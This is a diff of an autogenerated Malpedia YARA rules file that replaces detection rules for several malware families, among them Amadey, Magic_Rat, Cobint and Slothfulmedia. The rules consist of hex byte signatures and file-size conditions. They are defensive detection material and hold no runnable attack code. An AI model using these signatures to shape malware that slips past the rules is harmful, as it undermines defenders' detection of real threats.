-		$sequence_2 = { 8b4db8 51 ff15???????? 898540ffffff eb0a c78540ffffff00000000 8b55d8 }
-		$sequence_3 = { 8b8db8feffff 51 ff90a0000000 dbe2 8985b4feffff 83bdb4feffff00 }
-		$sequence_4 = { 8d953cffffff 52 6808200000 ff15???????? 898564feffff 8d8564feffff 50 }
-		$sequence_5 = { 51 8d45d8 52 50 ff15???????? 50 e8???????? }
-		$sequence_6 = { 8b45c8 898558ffffff c745c800000000 8b9558ffffff 8d4dcc ff15???????? c745fc30000000 }
-		$sequence_7 = { 57 50 ff15???????? 8d55c4 8d45c8 52 50 }
-		$sequence_8 = { 8b95d0feffff 52 8b85ccfeffff 50 ff15???????? 89853cfeffff eb0a }
-		$sequence_9 = { 8d9578ffffff 52 ff15???????? 83c420 50 8d8568ffffff }
+		$sequence_0 = { e8???????? 83c404 895e28 895e2c 8b4618 3bc3 741d }
+		$sequence_1 = { e8???????? 83c404 8b4c2440 895c2430 3bcb 895c2434 }
+		$sequence_2 = { 3bc6 7709 e8???????? 8b54244c 85f6 7643 8d2c32 }
+		$sequence_3 = { c1e902 f3a5 8bcb 83e103 f3a4 a1???????? 85c0 }
+		$sequence_4 = { 51 50 e8???????? 83c408 c3 81ec04010000 b941000000 }
+		$sequence_5 = { 8b742474 896c243c 881c28 8b4c241c }
+		$sequence_6 = { 89442424 7426 8d54246c 53 52 }
+		$sequence_7 = { 894c2478 68???????? 68???????? e8???????? 83c40c 8d542414 8d442468 }
+		$sequence_8 = { 49 51 e8???????? 83c404 8b4c245c 897c2448 897c244c }
+		$sequence_9 = { 8b10 50 ff5208 eb52 8b08 8d542414 52 }
 
 	condition:
-		7 of them and filesize < 1335296
+		7 of them and filesize < 188416
 }
-rule MALPEDIA_Win_Oni_Auto : FILE
+rule MALPEDIA_Win_Mpkbot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5b8ed8df-ac04-55ed-9aa1-c25508ccaf69"
+		id = "8f074133-bfc7-504a-bda1-097418743139"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.oni"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.oni_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mpkbot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mpkbot_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "a1166454b136e06548b4b89fd8ff394c058729ff7d3b6449cb76520548366b87"
+		logic_hash = "011afed12d8733a7391f09eb1750e489d4da026e534c4eca601c4698788ee6ad"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -97576,32 +97694,32 @@ rule MALPEDIA_Win_Oni_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c404 8b451c c745f80f000000 c745f400000000 c645e400 83f810 }
-		$sequence_1 = { 8bfb 6aff 8d4701 c746140f000000 50 8d4508 }
-		$sequence_2 = { 47 a1???????? 3bf8 7cc1 48 85c0 }
-		$sequence_3 = { 83c404 c745bc0f000000 c745b800000000 c645a800 8d8d60ffffff }
-		$sequence_4 = { c7411000000000 50 c60100 e8???????? 8d4d9c e8???????? 8b4594 }
-		$sequence_5 = { 0f1f4000 b9???????? 8d85e4f6ffff 0f1f440000 8a10 3a11 751a }
-		$sequence_6 = { c1e81f 03c2 0f8431020000 33db 8b4518 8d8d00ffffff 40 }
-		$sequence_7 = { c7411000000000 50 c60100 e8???????? 83ec18 8d4508 8bcc }
-		$sequence_8 = { 6a08 8d4c241c c74424300f000000 c744242c00000000 c644241c00 e8???????? 8b542428 }
-		$sequence_9 = { 83f810 7241 8b8d98fdffff 40 3d00100000 722a }
+		$sequence_0 = { 895010 895014 894818 89481c 895020 895024 5d }
+		$sequence_1 = { 50 683f000f00 6a00 ff750c ff7508 ff15???????? 85c0 }
+		$sequence_2 = { 68???????? ff15???????? 68???????? 50 ff15???????? ff750c a3???????? }
+		$sequence_3 = { ffd0 5d c3 68???????? ff15???????? 68???????? }
+		$sequence_4 = { 6689500e 33d2 c70028000000 895010 }
+		$sequence_5 = { ff7508 ff75fc ff15???????? ff75fc 6a00 }
+		$sequence_6 = { 6a18 5a 6689500e 33d2 }
+		$sequence_7 = { 56 68???????? 68???????? ffd7 6a00 }
+		$sequence_8 = { ff750c a3???????? ff7508 ffd0 5d }
+		$sequence_9 = { 8bf0 0fb7450c 50 0fb74508 }
 
 	condition:
-		7 of them and filesize < 499712
+		7 of them and filesize < 139264
 }
-rule MALPEDIA_Win_Boldmove_Auto : FILE
+rule MALPEDIA_Win_Slothfulmedia_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c0ee40b4-e9c4-5f65-956d-3ab91a0741b7"
+		id = "2e039255-65fc-54b3-b80d-fbd83d62f398"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.boldmove"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.boldmove_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.slothfulmedia"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.slothfulmedia_auto.yar#L1-L177"
 		license_url = "N/A"
-		logic_hash = "80c35171aa5675e2bb96034cca19e4fa2358df102e187fd20681a49dd8be92d9"
+		logic_hash = "4478c19c5b75da4be13e2a5e0ada629ab254eb002384f45d3b79eb582f1a6eaf"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -97615,32 +97733,38 @@ rule MALPEDIA_Win_Boldmove_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 5f 5d e9???????? c7442404???????? 893424 e8???????? }
-		$sequence_1 = { 83e00f 740f dd442420 dc0cc5e0694100 dd5c2420 83e6f0 0f853d070000 }
-		$sequence_2 = { 8b4da0 89442404 894c2408 8945a0 }
-		$sequence_3 = { 894dcc 8945d0 e8???????? 8b4dcc 8b45d0 }
-		$sequence_4 = { c744240434000000 89442408 c7042411000000 e8???????? 893424 89442404 }
-		$sequence_5 = { 85f6 0f84dd040000 ddd8 ddd8 83fe01 0f845a050000 }
-		$sequence_6 = { 89e5 56 53 8db5f8fbffff 81ec20040000 8b5d10 }
-		$sequence_7 = { 99 f7ff bf04000000 0fb63406 89c8 99 f7ff }
-		$sequence_8 = { 5e 5f 5d c3 55 31c0 b910000000 }
-		$sequence_9 = { 85c0 7408 890424 e8???????? 43 81fb00010000 75e4 }
+		$sequence_0 = { 3b45ec 0f82e5feffff 8b4508 53 56 }
+		$sequence_1 = { 8d4dec 51 6a58 ffd0 6683bde0fdffff5c 0f8587000000 be???????? }
+		$sequence_2 = { eb28 8b4f10 8bf0 6bf614 8d45fc 50 33c0 }
+		$sequence_3 = { eb65 53 8b1b ff15???????? 59 3bdf }
+		$sequence_4 = { 33db 895de4 8d7de8 ab ab ab 33c0 }
+		$sequence_5 = { f3a6 750b 66ff45f8 66837df85a 72ae }
+		$sequence_6 = { 59 8b45f8 6a01 03c0 50 ff75fc }
+		$sequence_7 = { 53 ff15???????? 59 ff75f8 ffd7 59 }
+		$sequence_8 = { 8d54240c 6a00 52 e8???????? 83c40c 6804010000 8d44240c }
+		$sequence_9 = { 6a00 ff15???????? 8b35???????? 8b3d???????? 90 68???????? }
+		$sequence_10 = { 85c0 7507 ffd7 83f805 74ee 6804010000 }
+		$sequence_11 = { 90 68???????? ffd6 85c0 7507 ffd7 }
+		$sequence_12 = { 81ec0c020000 a1???????? 33c4 89842408020000 56 57 68d0070000 }
+		$sequence_13 = { 6804010000 8d54240c 6a00 52 }
+		$sequence_14 = { 33cc 33c0 e8???????? 81c40c020000 }
+		$sequence_15 = { 6689442414 e8???????? 83c40c 6a00 ff15???????? 8b35???????? }
 
 	condition:
-		7 of them and filesize < 242688
+		7 of them and filesize < 122880
 }
-rule MALPEDIA_Win_Dispenserxfs_Auto : FILE
+rule MALPEDIA_Win_Cheesetray_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "49bf9fde-27a7-5a52-b363-6d4c360f5198"
+		id = "0e764866-65b7-5e4b-a972-c9b6a1308865"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dispenserxfs"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dispenserxfs_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cheesetray"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cheesetray_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "0ae97d732c7fee9f1fd4b6377f2a916fed962748494ab51169af7ce6e36e4229"
+		logic_hash = "c2cc89a9aac3f1f1be62615be1486f58a410f3fcbd107e350beb164393db52f7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -97654,34 +97778,34 @@ rule MALPEDIA_Win_Dispenserxfs_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8975c0 8975c4 8b35???????? 57 c745b430000000 c745b803000000 }
-		$sequence_1 = { 68???????? e8???????? c7042410270000 ff15???????? 6a00 }
-		$sequence_2 = { 6a02 ff15???????? 8bf0 83feff 74ef 8d85d4fdffff c785d4fdffff2c020000 }
-		$sequence_3 = { 7c08 8d50ec e8???????? 57 ff15???????? }
-		$sequence_4 = { 7451 33c9 33c0 8bd9 663b422e 731f 8b4230 }
-		$sequence_5 = { 50 ffd6 53 6a03 58 50 8d8555ffffff }
-		$sequence_6 = { 898de0feffff 89b5e4feffff 89b5e8feffff 89b5ecfeffff 89b5f0feffff 66899df6feffff }
-		$sequence_7 = { 8945f0 0f823cffffff 8b4df4 8b45e4 }
-		$sequence_8 = { 8bcf e8???????? 8d8548feffff 8bd3 50 8bcf }
-		$sequence_9 = { 8d55c4 83c414 8bf2 8a02 42 }
+		$sequence_0 = { 83b8a400000000 894d10 7666 8b88a0000000 8b0419 03cb 85c0 }
+		$sequence_1 = { 56 57 8d0c00 51 6a00 52 c745f800000000 }
+		$sequence_2 = { 0f8489000000 83f8fc 0f8480000000 8b4618 894508 8d5001 8a08 }
+		$sequence_3 = { c785c8f2ffff18104400 bb05000000 895704 eb22 83f8ff }
+		$sequence_4 = { bb01000000 019ea0160000 0fb690b02b4400 66019c9698040000 8d849698040000 81c1ffff0000 b800010000 }
+		$sequence_5 = { 83c410 85c0 0f84a2000000 56 57 6a0a }
+		$sequence_6 = { 1bcf 894508 0bc1 894d0c 75a2 5f }
+		$sequence_7 = { 8b7d08 8bc7 c1f805 8bf7 83e61f c1e606 03348580ce4400 }
+		$sequence_8 = { 33c9 03f0 13ca 8935???????? 890d???????? eb17 8bc8 }
+		$sequence_9 = { a1???????? 8b0f 83c40c 50 6a3b 51 }
 
 	condition:
-		7 of them and filesize < 114688
+		7 of them and filesize < 8626176
 }
-rule MALPEDIA_Win_Amadey_Auto : FILE
+rule MALPEDIA_Win_Nim_Blackout_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b3fa836d-4682-51f6-8e5a-a32138bd7f60"
+		id = "ff725f8e-78d8-573e-b72f-f808485072b3"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.amadey_auto.yar#L1-L207"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nim_blackout"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nim_blackout_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "47b9b6106a12c197931c79a9b3b33bf3efcee93c9479f6b1617cd096d3785a21"
+		logic_hash = "8bcac4d517a5c0195b2a1f86c54202d4da8e70268566b060cf8dd1e9526230c9"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -97693,45 +97817,34 @@ rule MALPEDIA_Win_Amadey_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 837e1410 7202 8b3e 8a0402 88040f 41 }
-		$sequence_1 = { 83f802 7427 e8???????? 83f810 }
-		$sequence_2 = { 83c408 83ec18 8bf4 83ec18 8bcc 68???????? }
-		$sequence_3 = { 8b10 ff7010 837d4c10 8d4d38 8b7548 0f434d38 }
-		$sequence_4 = { 83caff 8b4508 8bc8 83781410 7202 8b08 }
-		$sequence_5 = { 83f801 7431 e8???????? 83f802 7427 }
-		$sequence_6 = { 8bcc 68???????? e8???????? 8d4db4 e8???????? }
-		$sequence_7 = { 68???????? e8???????? 8d4dcc e8???????? 83c418 }
-		$sequence_8 = { 68???????? e8???????? 8d4d98 e8???????? 83c418 }
-		$sequence_9 = { 722f 8b8d78feffff 42 8bc1 81fa00100000 }
-		$sequence_10 = { 8985f4fbffff 8b85ecfbffff c1e002 8985f0fbffff 8b85f4fbffff 890424 e8???????? }
-		$sequence_11 = { e8???????? c7442404???????? 8d85e8feffff 890424 e8???????? 8d85e8feffff 890424 }
-		$sequence_12 = { c70424???????? e8???????? 8b45fc 89442408 c7442404???????? }
-		$sequence_13 = { 8d85f8fdffff 890424 e8???????? c744240800020000 c744240400000000 }
-		$sequence_14 = { 50 68???????? 83ec18 8bcc 68???????? }
-		$sequence_15 = { e8???????? 8985f4dfffff 83bdf4dfffff00 742c }
-		$sequence_16 = { 8945f4 eb05 ff4508 eba7 8b45f4 }
-		$sequence_17 = { 890424 e8???????? 89442404 8d85f8f9ffff 890424 e8???????? }
-		$sequence_18 = { eb0a c705????????04000000 83bd5cffffff06 7525 83bd60ffffff02 }
-		$sequence_19 = { 56 57 8b3d???????? 83ec18 }
-		$sequence_20 = { 51 e8???????? 83c408 8b9514feffff }
+		$sequence_0 = { 488b4510 488b4008 488b4018 488b4008 4889c2 b910000000 e8???????? }
+		$sequence_1 = { 84c0 7405 e8???????? 488b8570ffffff 488945f0 90 e9???????? }
+		$sequence_2 = { 488b4d10 e8???????? 488945b0 488b4510 488b00 480faf45e0 4889c1 }
+		$sequence_3 = { 0f9fc0 888583000000 0fb68583000000 83f001 84c0 0f85c2010000 488b85a0000000 }
+		$sequence_4 = { 488b45f0 4801d0 4883c010 c6002d eb1c 90 48c745d06c000000 }
+		$sequence_5 = { 488d0583c80100 488945d8 48c705????????00000000 48c745d040010000 488d0565c80100 488945d8 48c705????????00000000 }
+		$sequence_6 = { 488945d8 488d05d7fe0100 488945e8 48c745e000000000 66c745f00000 488d45d0 4889c1 }
+		$sequence_7 = { 48c705????????08000000 c605????????16 488d0522c40200 488905???????? 488d05b4fdffff 488905???????? c605????????01 }
+		$sequence_8 = { ba01000000 4889c1 488d45e8 488908 4889d0 83e001 84c0 }
+		$sequence_9 = { 7410 488b85a0000000 488b4038 488b00 eb05 b800000000 488b95a0000000 }
 
 	condition:
-		7 of them and filesize < 908288
+		7 of them and filesize < 1068032
 }
-rule MALPEDIA_Win_Magic_Rat_Auto : FILE
+rule MALPEDIA_Win_Cobint_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "294a613b-706a-59cd-8861-ad8f327481f6"
+		id = "dd3cfa53-3afd-5f13-9cc9-77e829d3a136"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.magic_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.magic_rat_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobint"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cobint_auto.yar#L1-L242"
 		license_url = "N/A"
-		logic_hash = "6b25c43e846cdbf4276d18349be54a1db9c0a30e7cc0f465fa60ef70531174db"
-		score = 60
-		quality = 45
+		logic_hash = "20f11bf7d864567f810adcdb08276a34acb4cfe1ecb4d7216907f33469c0f11b"
+		score = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -97743,34 +97856,48 @@ rule MALPEDIA_Win_Magic_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { eb1c 85c0 7910 ba00200000 29c2 89d0 c1f80e }
-		$sequence_1 = { 0f842f010000 83f8ff 740e f0832d????????01 }
-		$sequence_2 = { c1e010 eb1c 85c0 7910 ba00200000 29c2 89d0 }
-		$sequence_3 = { 7442 81fa???????? 742a 81fa???????? 7442 81fa???????? 744a }
-		$sequence_4 = { f6c380 b801000000 750d 89d8 c1e806 83f001 83e001 }
-		$sequence_5 = { 66251ffc 0c80 66894348 e9???????? }
-		$sequence_6 = { 85c0 7910 ba00200000 29c2 89d0 c1f80e }
-		$sequence_7 = { c0e902 83e101 09ca c1e202 }
-		$sequence_8 = { 0fb754244c 69d2e8030000 01d0 0fb754244e }
-		$sequence_9 = { 660f28c8 f20f5c0d???????? f20f2cd1 660fefc9 f20f2aca f20f5cc1 }
+		$sequence_0 = { 8b15???????? a1???????? 03d2 8b4d14 894cd00c a1???????? }
+		$sequence_1 = { 33f6 a3???????? 56 50 e8???????? 83c410 8935???????? }
+		$sequence_2 = { 59 3bc7 7408 33ff 57 }
+		$sequence_3 = { 8945e8 85c0 7470 2175fc }
+		$sequence_4 = { 890b 8b4508 8945e8 85c0 }
+		$sequence_5 = { 43 3bd8 0f8c59ffffff ff75fc ff15???????? 8bc7 }
+		$sequence_6 = { 8b7508 880e 8b4d10 49 51 }
+		$sequence_7 = { 8bec 56 57 8b7d08 33f6 a1???????? 03c6 }
+		$sequence_8 = { 8b75e4 53 ffd6 eb03 8b75e4 ff75d8 ffd6 }
+		$sequence_9 = { 740a 33c0 8b12 85d2 75c4 eb03 }
+		$sequence_10 = { 0355f0 8a45ec 8802 eb0b 8b4d08 034df0 8a55ed }
+		$sequence_11 = { 51 51 51 8d8d24feffff 51 ffd0 }
+		$sequence_12 = { 8d981b040000 64a130000000 895df4 8b400c 8b5014 }
+		$sequence_13 = { 90 90 90 90 90 749b }
+		$sequence_14 = { 90 749b 807ce19a80 7c90 }
+		$sequence_15 = { 90 e10b 96 7c90 90 90 }
+		$sequence_16 = { 837dec00 7418 037dec 8d45ec 50 }
+		$sequence_17 = { 885dff 8d45d0 c745d090010000 50 8d8524feffff }
+		$sequence_18 = { 90 90 bffc807c28 1a807c170e81 7cd7 }
+		$sequence_19 = { 8d45e8 2bdf 50 56 6a01 53 8d0437 }
+		$sequence_20 = { 83c005 c3 31b7807c30ae 807c909090 }
+		$sequence_21 = { 749b 807ce19a80 7c90 90 90 90 }
+		$sequence_22 = { 51 6800008000 51 51 51 8d8524feffff 50 }
+		$sequence_23 = { bffc807c28 1a807c170e81 7cd7 9b 807c909090 90 }
 
 	condition:
-		7 of them and filesize < 41843712
+		7 of them and filesize < 65536
 }
-rule MALPEDIA_Win_Cuegoe_Auto : FILE
+rule MALPEDIA_Win_R980_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f801c54c-d3a8-51b1-91c4-e3ef8af3f7f9"
+		id = "624a6ffd-b1f3-59a0-9a56-7f82cf4ce201"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cuegoe"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cuegoe_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.r980"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.r980_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "d0e6e6925a0e42ac5470513773688ead9a134439bb7102ccc5d0a7edc70c0169"
+		logic_hash = "ef4f026b46d8c7c29b2c5642311344a13e41f9d1ab13a98be1b516e844609533"
 		score = 75
-		quality = 75
+		quality = 45
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -97782,32 +97909,32 @@ rule MALPEDIA_Win_Cuegoe_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 895dfc e8???????? 59 8d4dd0 8bf0 e8???????? }
-		$sequence_1 = { 83781808 7205 8b4004 eb03 83c004 8d4de4 51 }
-		$sequence_2 = { 324dfe 80e17f 3008 8b06 8bc8 c1f905 8b0c8d80cf0310 }
-		$sequence_3 = { 8b4534 c645fc06 e8???????? 33f6 397548 7409 }
-		$sequence_4 = { 8b7da8 3bfb 7636 803e7f 7431 4f }
-		$sequence_5 = { c1e108 330c9d68a10310 bb01000000 898860020000 885c0658 8b7044 8b4824 }
-		$sequence_6 = { a1???????? 33c5 894558 6a38 b8???????? e8???????? }
-		$sequence_7 = { 894d14 8b4804 83c40c 03f7 297d0c 894d18 742c }
-		$sequence_8 = { eb02 33c0 8903 8365fc00 8d45f3 50 8b450c }
-		$sequence_9 = { ff7004 ff30 8d45d4 50 8bc6 e8???????? 8bc6 }
+		$sequence_0 = { 85c0 755b 6a04 e8???????? 83c404 8945f0 8bc8 }
+		$sequence_1 = { ff742428 e8???????? 53 8b5c2430 6a00 8d041f 50 }
+		$sequence_2 = { c7458001000000 c7857cffffff26000000 c745843d000000 6a01 57 8d857cffffff 8bcb }
+		$sequence_3 = { 7422 8b55a8 83e1ef 894dd8 894dd4 85d2 7412 }
+		$sequence_4 = { 8955fc 8bc4 8965e8 c7401407000000 895010 83781408 7202 }
+		$sequence_5 = { 8bc7 f00fc14104 7515 8b01 ff10 8b4db4 8bc7 }
+		$sequence_6 = { 7279 e8???????? 85c0 7570 6804010000 8d85e0fbffff 50 }
+		$sequence_7 = { e8???????? e9???????? 68???????? 8d4dd8 e8???????? 8d45d8 c745fc01000000 }
+		$sequence_8 = { 8975f0 c745fc00000000 85f6 7416 8d4e08 c645fc01 50 }
+		$sequence_9 = { 8b4634 3b4630 75a5 e9???????? 2b5e10 b801000000 5f }
 
 	condition:
-		7 of them and filesize < 540672
+		7 of them and filesize < 3178496
 }
-rule MALPEDIA_Win_Multigrain_Pos_Auto : FILE
+rule MALPEDIA_Win_Deltas_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "72a7f3f7-5585-5b52-9f6b-6aafeee8dfc7"
+		id = "25a7191c-2842-5745-a11d-ea324cb5fa9f"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.multigrain_pos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.multigrain_pos_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.deltas"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.deltas_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "20f055bfbc8013c86389227ab88ba0d8272e12b77bffca2ef889258bc8b1eb3c"
+		logic_hash = "c404323fb1d2a8c3fdb1b29caf32d56e1cbc5b9f3900009b6282344552f18e72"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -97821,34 +97948,34 @@ rule MALPEDIA_Win_Multigrain_Pos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 83c404 33c0 837dd408 c745bc07000000 c745b800000000 }
-		$sequence_1 = { 50 6a00 6a02 6a10 68120000a0 }
-		$sequence_2 = { 730d 0fb64c1e01 c1e905 894df4 }
-		$sequence_3 = { c745f400000000 c645e400 e8???????? 57 e8???????? 83c404 8d45e4 }
-		$sequence_4 = { 8b8760040000 50 ff30 8d45fc 50 8d8f60040000 }
-		$sequence_5 = { 3b01 0f823efeffff 8b55f8 5f }
-		$sequence_6 = { 8bf1 8b4710 3bc3 0f82e8000000 8b4d14 8b5610 2bc3 }
-		$sequence_7 = { 1bc0 f7d8 5e 5d c20800 85f6 750f }
-		$sequence_8 = { 83ec10 894df8 8bca 56 33c0 33f6 8955fc }
-		$sequence_9 = { c7461000000000 c7461400000000 e8???????? 894610 6800040000 8d4618 }
+		$sequence_0 = { ffd3 8b442420 85c0 7507 c6851045000001 }
+		$sequence_1 = { 03f3 8b5604 8b06 85c0 }
+		$sequence_2 = { 55 ff15???????? 83fbff 7407 53 ff15???????? 8b442410 }
+		$sequence_3 = { 0bc2 33c1 03c5 8b6c2424 8db430e0e62cfe 8bc6 c1e816 }
+		$sequence_4 = { 85ed 7407 55 ff15???????? 83fbff 7407 }
+		$sequence_5 = { 8bc7 f7d0 03d1 0bc2 33c1 03442428 8d843097ff2a43 }
+		$sequence_6 = { 88442461 88442462 8b35???????? 8d442470 }
+		$sequence_7 = { 8b5604 89542448 8d542428 8b4608 }
+		$sequence_8 = { 8b44240c 8b35???????? 50 ffd6 8b4c2410 51 ffd6 }
+		$sequence_9 = { 55 56 8be9 57 b940000000 33c0 8dbc242d010000 }
 
 	condition:
-		7 of them and filesize < 286720
+		7 of them and filesize < 90112
 }
-rule MALPEDIA_Win_Cobint_Auto : FILE
+rule MALPEDIA_Win_Micrass_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "dd3cfa53-3afd-5f13-9cc9-77e829d3a136"
+		id = "d96a8185-8065-503d-97cd-f54a64309e1a"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobint"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cobint_auto.yar#L1-L242"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.micrass"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.micrass_auto.yar#L1-L115"
 		license_url = "N/A"
-		logic_hash = "20f11bf7d864567f810adcdb08276a34acb4cfe1ecb4d7216907f33469c0f11b"
+		logic_hash = "faa5276115d7780fcc63dd8ad050c766a7977fec6ea03be4a57f43d14c048567"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -97860,83 +97987,80 @@ rule MALPEDIA_Win_Cobint_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b15???????? a1???????? 03d2 8b4d14 894cd00c a1???????? }
-		$sequence_1 = { 33f6 a3???????? 56 50 e8???????? 83c410 8935???????? }
-		$sequence_2 = { 59 3bc7 7408 33ff 57 }
-		$sequence_3 = { 8945e8 85c0 7470 2175fc }
-		$sequence_4 = { 890b 8b4508 8945e8 85c0 }
-		$sequence_5 = { 43 3bd8 0f8c59ffffff ff75fc ff15???????? 8bc7 }
-		$sequence_6 = { 8b7508 880e 8b4d10 49 51 }
-		$sequence_7 = { 8bec 56 57 8b7d08 33f6 a1???????? 03c6 }
-		$sequence_8 = { 8b75e4 53 ffd6 eb03 8b75e4 ff75d8 ffd6 }
-		$sequence_9 = { 740a 33c0 8b12 85d2 75c4 eb03 }
-		$sequence_10 = { 0355f0 8a45ec 8802 eb0b 8b4d08 034df0 8a55ed }
-		$sequence_11 = { 51 51 51 8d8d24feffff 51 ffd0 }
-		$sequence_12 = { 8d981b040000 64a130000000 895df4 8b400c 8b5014 }
-		$sequence_13 = { 90 90 90 90 90 749b }
-		$sequence_14 = { 90 749b 807ce19a80 7c90 }
-		$sequence_15 = { 90 e10b 96 7c90 90 90 }
-		$sequence_16 = { 837dec00 7418 037dec 8d45ec 50 }
-		$sequence_17 = { 885dff 8d45d0 c745d090010000 50 8d8524feffff }
-		$sequence_18 = { 90 90 bffc807c28 1a807c170e81 7cd7 }
-		$sequence_19 = { 8d45e8 2bdf 50 56 6a01 53 8d0437 }
-		$sequence_20 = { 83c005 c3 31b7807c30ae 807c909090 }
-		$sequence_21 = { 749b 807ce19a80 7c90 90 90 90 }
-		$sequence_22 = { 51 6800008000 51 51 51 8d8524feffff 50 }
-		$sequence_23 = { bffc807c28 1a807c170e81 7cd7 9b 807c909090 90 }
+		$sequence_0 = { 83bd20faffff14 7324 8b85f0fcffff 038520faffff }
+		$sequence_1 = { 8bec 837d0800 7e1f 56 b9???????? 8bf2 2bc8 }
+		$sequence_2 = { 0fb6c0 eb12 8b45e0 8a807c194000 08443b1d 0fb64601 }
